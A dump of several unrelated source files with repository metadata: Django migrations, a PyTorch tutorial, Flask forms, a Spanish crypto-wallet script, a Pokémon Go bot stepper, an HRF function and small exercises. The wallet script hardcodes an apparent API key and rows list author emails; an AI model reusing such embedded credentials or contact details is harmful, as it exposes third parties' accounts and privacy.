'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'flatpages_plus.categories': {
'Meta': {'object_name': 'Categories'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'flatpages_plus.flatpage': {
'Meta': {'ordering': "('url',)", 'object_name': 'FlatPage'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['flatpages_plus.Categories']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'enable_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_social': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u'unamed'", 'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['auth.User']"}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'registration_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'p'", 'max_length': '1'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '70', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150', 'db_index': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['flatpages_plus'] | [
"oleg.dolya@gmail.com"
] | oleg.dolya@gmail.com |
af5d7b1d518ffbf1091fa797c5bab04d0ceafc39 | 5b5eb61c02a1ee6632036a31108d5c962d474d2e | /00/pytorch.py | bae78442e40b561cf168d0df6d691ad703c08406 | [] | no_license | seven320/deeplearning | 73c76fa5e006a9164ed11fe9538b4975c0bdc161 | 56300e450caf390b4f953a9c882a9b4701ccb971 | refs/heads/master | 2021-04-26T22:27:47.019462 | 2018-11-06T02:09:04 | 2018-11-06T02:09:04 | 124,096,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,648 | py |
# coding: utf-8
# What is PyTorch?
# https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py
# In[ ]:
from __future__ import print_function
import torch
x = torch.empty(5, 3)
print(x)
# Randomly initialized matrix
# In[7]:
x = torch.rand(5,3)
print(x)
# In[ ]:
0初期設定の行列
# In[8]:
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# 実際の値からの行列
# In[9]:
x = torch.tensor([5.5, 3])
print(x)
# In[11]:
x = x.new_ones(5, 3, dtype=torch.double)
print(x)
x = torch.randn_like(x, dtype=torch.float)
print(x)
# In[14]:
print(x.size())
# In[25]:
# x = x.new_ones(5, 3, dtype=torch.double)
x = torch.randn_like(x, dtype=torch.float)
y = torch.rand(5,3)
print(x + y)
# print(x + y)
# In[26]:
print(torch.add(x, y))
# In[29]:
result = torch.empty(5,3)
torch.add(x, y, out=result)
print(result)
# In[30]:
y.add_(x)
print(y)
# In[32]:
print(x)
print(x[:, 1])
# In[36]:
x = torch.randn(4,4)
y = x.view(8,2)
z = x.view(-1, 8)
print(x.size(),y.size(),z.size())
# In[38]:
x = torch.randn(1)
print(x)
print(x.item())
# In[40]:
a = torch.ones(5)
print(a)
# In[47]:
import numpy as np
b = a.numpy()
print(b)
c = np.copy(a.numpy())
print(c)
# In[42]:
a.add_(1)
print(a)
print(b)
# In[49]:
a = np.ones(5)
b = torch.from_numpy(a)
print(a,b)
np.add(a, 1, out=a)
print(a,b)
# In[50]:
if torch.cuda.is_available():
device = torch.device("cuda")
y = torch.ones_like(x, device=device)
x = x.to(device)
z = x + y
print(z)
print(z.to("cpu", torch.double))
| [
"yosyuaomenw@yahoo.co.jp"
] | yosyuaomenw@yahoo.co.jp |
994204c474ce80f07986e8118e7b966b7403e899 | d6f75ab837cfbeabfe621e2326b9e7abed1af90e | /care/migrations/0002_picture_complete_status.py | 7b5fdcef85cb94564f404eea0013c4a2ad935c38 | [] | no_license | staradayev/HomeScreen | bb7da1b601e9d38e6af3367b6cf6cddf6cd98ba4 | 79b48229248ca6b104c27313782fbb20e3aa7f52 | refs/heads/master | 2022-02-26T20:02:53.382588 | 2022-02-15T12:06:35 | 2022-02-15T12:06:35 | 12,647,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('care', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='picture',
name='complete_status',
field=models.BooleanField(default=False),
preserve_default=True,
),
]
| [
"staradayev@waverleysoftware.com"
] | staradayev@waverleysoftware.com |
f0388c81796984757e46834de48ad777d5de93dc | 525f9d4a221ae3125b3b4d13bdb11ccb1b779209 | /app/main/forms.py | 298f8a884b51bb626747620fa3c5c674bc1fefc2 | [] | no_license | KobiCat/BlogPyCoursework | 39c86f0f40086f18ca3441f90f111d2a61d27651 | 6c8428b71dd993d6cd76533809fa452cd1cfe6cb | refs/heads/master | 2023-01-20T09:00:28.955691 | 2020-11-24T11:17:48 | 2020-11-24T11:17:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,721 | py | from flask import request
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField
from wtforms.validators import ValidationError, DataRequired, Length
from flask_babel import _, lazy_gettext as _l
from app.models import User
class SearchForm(FlaskForm):
q = StringField(_l('Search'), validators=[DataRequired()])
def __init__(self, *args, **kwargs):
if 'formdata' not in kwargs:
kwargs['formdata'] = request.args
if 'csrf_enabled' not in kwargs:
kwargs['csrf_enabled'] = False
super(SearchForm, self).__init__(*args, **kwargs)
class EditProfileForm(FlaskForm):
username = StringField(_l('Username'), validators=[DataRequired()])
about_me = TextAreaField(_l('About me'),
validators=[Length(min=0, max=140)])
submit = SubmitField(_l('Submit'))
def __init__(self, original_username, *args, **kwargs):
super(EditProfileForm, self).__init__(*args, **kwargs)
self.original_username = original_username
def validate_username(self, username):
if username.data != self.original_username:
user = User.query.filter_by(username=self.username.data).first()
if user is not None:
raise ValidationError(_('Please use a different username.'))
class EmptyForm(FlaskForm):
submit = SubmitField('Submit')
class PostForm(FlaskForm):
post = TextAreaField(_l('Say something'), validators=[DataRequired()])
submit = SubmitField(_l('Submit'))
class MessageForm(FlaskForm):
message = TextAreaField(_l('Message'), validators=[
DataRequired(), Length(min=0, max=140)])
submit = SubmitField(_l('Submit'))
| [
"keduk2014@gmail.com"
] | keduk2014@gmail.com |
20c1ebe69b8044e89542aaf3c6fccbb22b582a11 | 4a474a98d6cf3a2b778e5572be4920ef5e5aad2e | /Proyecto billetera.py | 0402c941c8deef208629c1009882b29927ae2a5f | [] | no_license | Roger-MG/billetera_criptomonedas | 5d25fd57bc1080008faa694b5d5199298aa60ef0 | 080700ae029e32e87d64a23767055c5614d8394e | refs/heads/main | 2023-06-25T08:12:05.498896 | 2021-07-28T13:56:41 | 2021-07-28T13:56:41 | 390,367,975 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,297 | py | #Proyecto billetera para criptos
import requests
from datetime import datetime #Obtener fecha y hora del sistema
diaConsulta = datetime.now () #Indica la hora actual
global registro
registro = list ()
global codigo_usuario
codigo_usuario = int (input ("¡Bienvenido! Por favor indique su numero de usuario: ")) #Solicita al usuario su código
global balance_moneda
balance_moneda = 0
monedas_list = []
precios_list = []
COINMARKET_API_KEY = "edfb80cf-4e28-402c-868f-6071813d94df"
headers = {
'Accepts' : 'application/json',
'X-CMC_PRO_API_KEY' : COINMARKET_API_KEY
}
data = requests.get ("https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest", headers = headers).json()
for cripto in data ["data"] :
monedas_list.append (cripto ["symbol"])
precios_list.append(cripto ["quote"]["USD"]["price"])
def moneda_recibida (cripto) :
return cripto in recibir_moneda
def moneda_enviada (cripto) :
return cripto in enviar_moneda
def moneda_consulta (cripto) :
return cripto in consulta_cripto
recibir_moneda = tuple (monedas_list)
enviar_moneda = tuple (monedas_list)
consulta_cripto = tuple (monedas_list)
precios = tuple (precios_list)
class Transacciones : #Atributos transacciones
transaccion_info = ()
saldo_total_usd = 0
recibir_moneda = ""
enviar_moneda = ""
recibir_cantidad = 0
enviar_cantidad = 0
rt = Transacciones
def recibir_monto () :
rt.recibir_moneda = input ("Ingrese la moneda a recibir: ") #Indica la moneda a recibir por el usuario
while not moneda_recibida (rt.recibir_moneda): #Verifica cripto
print("Moneda invalida.")
rt.recibir_moneda = input ("Ingrese la moneda a recibir: ")
rt.recibir_cantidad = float (input ("Ingrese la cantidad a recibir: ")) #Indica la cantidad a recibir por el usuario
codigo_sender = int (input ("Código del usuario que envía las criptomonedas: ")) #Indica el código de usuario de quien envía las criptos
if codigo_sender == codigo_usuario : #Verifica que el código de quien envía sea distinto al que recibe
i = 0
while i == 0 :
print ("Código de usuario personal, por favor verifique el código de usuario.")
codigo_sender = int (input ("Código del usuario que envía las criptomonedas: "))
if codigo_sender != codigo_usuario :
i = i + 1
indice_moneda = monedas_list.index (rt.recibir_moneda) #Devuelve el índice en el cual se encuentra la cripto
precio = precios_list [indice_moneda] #Busca el precio de la cripto en la lista de precios
cantidad_fiat_recibida = rt.recibir_cantidad * precio #Indica monto en USD de cripto
rt.transaccion_info = "Ud. recibió%6.2f"%float(rt.recibir_cantidad) + " " + rt.recibir_moneda + " del usuario " + str(codigo_sender) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Confirma la transacción al usuario.
print ("Ud. recibió%6.2f"%float (rt.recibir_cantidad) + " " + rt.recibir_moneda + " del usuario " + str(codigo_sender) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Confirma la transacción al usuario.
print ("%6.2f"%float (cantidad_fiat_recibida))
rt.saldo_total_usd = rt.saldo_total_usd + cantidad_fiat_recibida
print ("%6.2f"%float (rt.saldo_total_usd))
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def transferir_monto () :
rt.enviar_moneda = input ("Ingrese la moneda a enviar: ") #Indica la moneda a enviar por el usuario
while not moneda_enviada (rt.enviar_moneda): #Verifica cripto
print("Moneda invalida.")
rt.enviar_moneda = input ("Ingrese la moneda a enviar: ")
rt.enviar_cantidad = float (input ("Ingrese la cantidad a enviar: ")) #Indica la cantidad a recibir por el usuario
indice_moneda = monedas_list.index (rt.enviar_moneda) #Devuelve el índice en el cual se encuentra la cripto
precio = precios_list [indice_moneda] #Busca el precio de la cripto en la lista de precios
cantidad_fiat_enviada = rt.enviar_cantidad * precio #Indica monto en USD de cripto
if cantidad_fiat_enviada > rt.saldo_total_usd : #Verifica que el usuario tenga saldo sufiente en la cuenta para transferir
e = 0
while e == 0 :
print ("Fondos insuficientes, por favor verifique la transacción e indique un nuevo monto.")
rt.enviar_cantidad = float (input ("Ingrese la cantidad a enviar: "))
cantidad_fiat_enviada = rt.enviar_cantidad * precio
if cantidad_fiat_enviada <= rt.saldo_total_usd :
e = e + 1
codigo_destinatario = int (input ("Código del usuario destinatario de las criptomonedas: ")) #Indica el código de usuario destinatario de las criptos
if codigo_destinatario == codigo_usuario : #Verifica que el código del destinatario sea distinto al del usuario
i = 0
while i == 0 :
print ("Código de usuario personal, por favor verifique el código de usuario.")
codigo_destinatario = int (input ("Código del usuario destinatario de las criptomonedas: "))
if codigo_destinatario != codigo_usuario :
i = i + 1
rt.transaccion_info = "Ud. envió%6.2f"%float(rt.enviar_cantidad) + " " + rt.enviar_moneda + " al usuario " + str(codigo_destinatario) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Registra la transacción al usuario.
print ("Ud. envió%6.2f"%float(rt.enviar_cantidad) + " " + rt.enviar_moneda + " al usuario " + str(codigo_destinatario) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Confirma la transacción al usuario.
print ("%6.2f"%float (cantidad_fiat_enviada))
rt.saldo_total_usd = rt.saldo_total_usd - cantidad_fiat_enviada
print ("%6.2f"%float (rt.saldo_total_usd))
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def balance_cripto () :
consulta_cripto = str (input ("Indique la criptomoneda a consultar: ")) #Solicita la cripto para consultar balance
while not moneda_consulta (consulta_cripto): #Verifica cripto
print("Moneda Invalida.")
consulta_cripto = input ("Ingrese la moneda a consultar: ")
for rt.transaccion_info in registro :
if rt.recibir_moneda == consulta_cripto and rt.enviar_moneda == consulta_cripto :
balance_moneda = (float (rt.recibir_cantidad) - float (rt.enviar_cantidad))
print ("Su balance de " + consulta_cripto + " es de " + str (balance_moneda) + " al día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Muestra el balance de la criptomoneda
rt.transaccion_info = "Ud. consultó su balance de la moneda " + consulta_cripto + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Guarda registro de la consulta en el registro general
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def balance_general () :
print ("Su balance total es de " + str ("%6.2f"%float (rt.saldo_total_usd)) + " USD al día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Muestra el balance de la criptomoneda
rt.transaccion_info = "Ud. consultó su balance general el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Guarda registro de la consulta en el registro general
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def registro_transacciones () :
print ("Este es el registro de todos sus movimientos:")
archivo = open ("registro_transacciones.txt")
print (archivo.read())
archivo.close()
def salir () :
print ("Gracias por usar la billetera, ¡hasta pronto!") #Imprime mensaje de despedida al usuario y cierra la aplicación
def archivo_registro () : #Guarda el registro en un archivo de texto
archivo = open ("registro_transacciones.txt", "a")
archivo.write (rt.transaccion_info + "\n")
archivo.close()
def iniciar_billetera () : #Muestra el menú de opciones al usuario y espera por la selección del usuario
opcion = 0
while opcion != 6 :
#Preguntar opción
print ("Por favor seleccione una de las siguientes opciones: \n 1- Recibir criptomonedas. \n 2- Transferir criptomonedas. \n 3- Mostrar balance de criptomoneda. \n 4- Mostrar balance general. \n 5- Mostrar histórico de transacciones. \n 6- Salir del programa.")
opcion = int (input ("Introduzca su selección: "))
if opcion == 1 :
recibir_monto ()
elif opcion == 2 :
transferir_monto ()
elif opcion == 3 :
balance_cripto ()
elif opcion == 4 :
balance_general ()
elif opcion == 5 :
registro_transacciones ()
elif opcion == 6 :
salir ()
else :
print ("Por favor seleccione una opción válida.") #Verifica que el usuario seleccione una opción válida
iniciar_billetera ()
| [
"noreply@github.com"
] | Roger-MG.noreply@github.com |
4a70189f56b7c999e46df08262eb3ac37e231c87 | 77871bb4c5f4714a19c33ad804a20c94bcdacc7e | /Interfaces/AI/Stepper/Pokestopper.py | abd44d28f5e7de1647e7ca9a35e479c9fd8da45b | [] | no_license | MaxOnNet/PokeStats | 58165f449acf3fc5b14e4f3a63a783f947df3eb8 | 3eb5aa2d13833b1d2299023f4d6f88348bae3bd6 | refs/heads/master | 2021-01-20T20:28:56.999545 | 2016-08-24T08:06:41 | 2016-08-24T08:06:41 | 63,936,162 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,961 | py | # -*- coding: utf-8 -*-
import logging
import random
from math import ceil
from sqlalchemy import text as sql_text
from Interfaces.MySQL.Schema import Pokestop, parse_map_cell
from Interfaces.AI.Human import sleep, random_lat_long_delta, action_delay
from Interfaces.AI.Stepper.Normal import Normal
from Interfaces.AI.Worker.Utils import format_time, distance
from Interfaces.pgoapi.utilities import f2i, h2f, get_cell_ids
log = logging.getLogger(__name__)
class Pokestopper(Normal):
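    """Stepper that routes the bot between nearby pokestops and farms them (catching is disabled)."""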
def inicialise(self):
log.info('Точечное сканирование P\S, переопределяем переменные БД')
self.scanner.mode.step = 0.0015
self.scanner.mode.walk = 6
self.scanner.mode.is_catch = False
self.scanner.mode.is_farm = True
self.scanner.mode.is_lookup = False
self.scanner.mode.is_defender = False
def take_step(self):
position = [self.origin_lat, self.origin_lon, 0]
coords = self.generate_coords(self.origin_lat, self.origin_lon, self.step, self.distance)
self.metrica.take_position(position, self.geolocation.get_google_polilyne(coords))
self.api.set_position(*position)
step = 1
for coord in coords:
self.metrica.take_status(scanner_msg='Point P\S ({} / {})'.format(step, len(coords)))
log.info('Точечное сканирование P\S ({} / {})'.format(step, len(coords)))
position = (coord['lat'], coord['lng'], 0)
if self.walk > 0:
self._walk_to(self.walk, *position)
else:
self.api.set_position(*position)
self.ai.heartbeat()
self._work_at_position(position[0], position[1], position[2], seen_pokemon=False, seen_pokestop=True, seen_gym=False, data=coord['id'])
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
step += 1
def _walk_to(self, speed, lat, lng, alt):
dist = distance(self.api._position_lat, self.api._position_lng, lat, lng)
steps = (dist + 0.0) / (speed + 0.0) # may be rational number
intSteps = int(steps)
residuum = steps - intSteps
log.info('Бежим из ' + str((self.api._position_lat, self.api._position_lng)) + " в " + str(str((lat, lng))) +
" на " + str(round(dist, 2)) + " по прямой. " + str(format_time(ceil(steps))))
if steps != 0:
dLat = (lat - self.api._position_lat) / steps
dLng = (lng - self.api._position_lng) / steps
for i in range(intSteps):
cLat = self.api._position_lat + dLat + random_lat_long_delta()
cLng = self.api._position_lng + dLng + random_lat_long_delta()
self.api.set_position(cLat, cLng, alt)
self.ai.heartbeat()
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
self.api.set_position(lat, lng, alt)
self.ai.heartbeat()
def _work_at_position(self, lat, lng, alt, seen_pokemon=False, seen_pokestop=False, seen_gym=False, data=None):
if data is not None:
pokestop = self.session.query(Pokestop).get(data)
cell = {
'forts': [
{
'id': pokestop.id,
'type': 1,
'latitude': pokestop.latitude,
'longitude': pokestop.longitude
}
]
}
self.metrica.take_search({'pokestops': 1})
self.api.set_position(lat, lng, alt)
self.ai.work_on_cell(cell, (lat, lng, alt), seen_pokemon=False, seen_pokestop=True, seen_gym=False)
position = (lat, lng, alt)
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
map_cells = list()
sleep(self.ai.delay_scan)
response_dict = self.api.get_map_objects(latitude=f2i(lat), longitude=f2i(lng), since_timestamp_ms=timestamp, cell_id=cellid)
self.search.search(lat, lng)
if response_dict and 'status_code' in response_dict:
if response_dict['status_code'] is 1:
if 'responses' in response_dict:
if 'GET_MAP_OBJECTS' in response_dict['responses']:
if 'status' in response_dict['responses']['GET_MAP_OBJECTS']:
if response_dict['responses']['GET_MAP_OBJECTS']['status'] is 1:
map_cells = response_dict['responses']['GET_MAP_OBJECTS']['map_cells']
# Update current scanner location
self.metrica.take_position(position)
map_cells.sort(key=lambda x: distance(lat, lng, x['forts'][0]['latitude'], x['forts'][0]['longitude']) if 'forts' in x and x['forts'] != [] else 1e6)
log.debug("Получена информация о карте в размере {0} ячеек".format(len(map_cells)))
for cell in map_cells:
self.metrica.take_search(parse_map_cell(cell, self.session))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['responses']['GET_MAP_OBJECTS']['status']))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['status_code']))
self.api.set_position(lat, lng, alt)
for cell in map_cells:
self.ai.work_on_cell(cell, position, seen_pokemon=seen_pokemon, seen_pokestop=seen_pokestop, seen_gym=seen_gym)
def generate_coords(self, latitude, longitude, step_size, distance):
sql = """
SELECT
id as "pokestop_id",
latitude as "pokestop_latitude",
longitude as "pokestop_longitude",
(
6371 * acos (
cos ( radians({0}) )
* cos( radians( latitude ) )
* cos( radians( longitude ) - radians({1}) )
+ sin ( radians({2}) )
* sin( radians( latitude ) )
) * 1000
) AS "pokestop_distance"
FROM pokestop
HAVING pokestop_distance < {3}
ORDER BY pokestop_distance
""".format(latitude, longitude, latitude, distance)
coords = []
for pokestop in self.session.execute(sql_text(sql)):
lat = pokestop[1] + random_lat_long_delta()
lng = pokestop[2] + random_lat_long_delta()
coords.append({'lat': lat, 'lng': lng, 'id': pokestop[0]})
return coords | [
"viktor@tatarnikov.org"
] | viktor@tatarnikov.org |
72d83f61ea7278de06a9f45c110a3ffba2430063 | 163808746e51d378f69a966645b8bb8a855b4625 | /MyMain1012/MyMain1012/mislHrf.py | 860d28ba23c0e7b4b51f525d9b16734181920a56 | [] | no_license | 0024thiroshi/comm5.0_fall_semester | 02b26b506b759dd7b18b963295a8908cb4a78245 | db350599b7085e56fbf2c316e74cd7a5b48f02b8 | refs/heads/main | 2023-02-12T13:07:34.080809 | 2021-01-13T06:03:04 | 2021-01-13T06:03:04 | 329,202,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | import scipy
import numpy as np
from math import exp
import pandas as pd
import scipy.stats as sps
import matplotlib.pyplot as plt
import math
def hrf(nt,
peak_delay=6,
under_delay=10,
           p_u_ratio = 6,):  # nt: sampling interval in seconds
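    # Canonical double-gamma HRF: a gamma-shaped peak minus a scaled, delayed
    # gamma undershoot, sampled every nt seconds over 0-30 s and normalized
    # to a unit peak.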
t = np.arange(0,30+nt,nt)
peak_disp=1
under_disp=1
normalize=True
    hrf = np.zeros(t.shape, dtype=float)  # plain float; the np.float alias was removed in newer NumPy
pos_t = t[t > 0]
peak = sps.gamma.pdf(pos_t,
peak_delay/peak_disp,
loc=0,
scale=peak_disp)
UD = under_delay + peak_delay
undershoot = sps.gamma.pdf(pos_t,
UD / under_disp,
loc=0,
scale=under_disp)
hrf = peak - undershoot / p_u_ratio
if not normalize:
return hrf
return hrf / np.max(hrf)
| [
"“0024thiroshi@gmail.com”"
] | “0024thiroshi@gmail.com” |
70cd0f7ef97a463fae3db5e76f2191296a70c392 | 06fa7c7e45c8406b88ac663ff90113fab3e9a2cc | /패스트캠퍼스/유형별문제풀이/그래프/유기농배추.py | d86acde13447256b5e7c8ad0967f25facfaf211e | [] | no_license | choiseongjun/pyAlgo | 00aca2dae07c32af2297067acb63c3426f1b8006 | 140d956201480cdc36208ddbc73694c418d80d30 | refs/heads/master | 2023-07-10T18:30:16.021666 | 2021-08-21T10:16:44 | 2021-08-21T10:16:44 | 291,391,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | import sys
sys.setrecursionlimit(100000)
def dfs(x,y):
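    # Flood fill: mark this cell as visited, then recurse into the four
    # neighbouring cells that contain cabbage and are still unvisited.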
visited[x][y]= True
directions = [(-1,0),(1,0),(0,-1),(0,1)]
for dx,dy in directions:
nx,ny = x+dx,y+dy
if nx<0 or nx>=n or ny<0 or ny>=m:
continue
if array[nx][ny] and not visited[nx][ny]:
dfs(nx,ny)
if __name__ == '__main__':
for _ in range(int(input())):
m,n,k = map(int,input().split())
array = [[0]*m for _ in range(n)]
visited = [[False]*m for _ in range(n)]
for _ in range(k):
y,x = map(int,input().split())
array[x][y]=1
result=0
for i in range(n):
for j in range(m):
if array[i][j] and not visited[i][j]:
dfs(i,j)
result+=1
print(result) | [
"csj2702@naver.com"
] | csj2702@naver.com |
b110edb9f48ccae3c6ff80bd3c04ab0d2029c060 | 8e260d6f6858bde5479d2721805f056b01acb798 | /loop1.py | 36b5069684bfcf0c744ed1326411e1145882c472 | [] | no_license | cyslug/tests | c77e7745b3fe63272fa1e319f27f7053a91a4957 | 692de6f53f6396ec3a69bc70aa93c72cb235f329 | refs/heads/master | 2021-01-13T14:54:28.906507 | 2017-07-17T14:01:47 | 2017-07-17T14:01:47 | 76,464,992 | 0 | 0 | null | 2017-07-17T14:01:48 | 2016-12-14T14:07:14 | null | UTF-8 | Python | false | false | 130 | py | emails = ["me@hotmail.com", "you@hotmail.com", "they@gmail.com"]
for item in emails:
if "gmail" in item:
print(item)
| [
"noreply@github.com"
] | cyslug.noreply@github.com |
c04d091c8fe19070af6afcc94199fcf91fd50791 | 9d6613627914434723b6e30a79e229c448379768 | /test.py | 942c75d95ce7a6f566e5b2fbb8a505c823aec8ff | [
"MIT"
] | permissive | arka816/php-node-transpiler | 1ea910656995ec15e1df28e6e9f727557d0c86a8 | 60228d45d546523b2bcaec6a9b667182ed691817 | refs/heads/master | 2022-11-14T15:51:16.474793 | 2020-06-23T16:49:24 | 2020-06-23T16:49:24 | 273,939,533 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from phplexer import tokenizer
from phpparser import generateAST
f = open("server.php", "r", encoding="utf-8")
s = f.read()
tokenlist = tokenizer(s[s.find("php")+3:])
root=generateAST(tokenlist) | [
"noreply@github.com"
] | arka816.noreply@github.com |
25be4fae46145ceb5e47fa22fb8cdd1e9069acff | 19a4383c061f76c5217b8070d59012100aef1518 | /one/Scripts/easy_install-script.py | 96510d4ab43bab65196d8e1bd225747fe4359631 | [
"MIT"
] | permissive | WaiYan-1302/Git-Python | 62b797bfabf1d3d10a06ba91289db19f27e5a7e3 | 9f777a83229a71aa963a33d55b52b0746d59f663 | refs/heads/master | 2020-11-24T07:13:15.765497 | 2020-02-29T13:48:29 | 2020-02-29T13:48:29 | 228,021,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | #!"C:\Users\scrip\Desktop\New folder\Python Class Sat Sun 2\Python-Sat-Sun-Batch-5-master\one\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"script1302@gmail.com"
] | script1302@gmail.com |
b2eb613a9162290732d40c2631fdb47d3cb98dbf | af3ec207381de315f4cb6dddba727d16d42d6c57 | /dialogue-engine/src/programy/storage/stores/sql/dao/link.py | f6447200627f0fc643988dcc8badf78e7d13dab7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mcf-yuichi/cotoba-agent-oss | 02a5554fe81ce21517f33229101013b6487f5404 | ce60833915f484c4cbdc54b4b8222d64be4b6c0d | refs/heads/master | 2023-01-12T20:07:34.364188 | 2020-11-11T00:55:16 | 2020-11-11T00:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,960 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
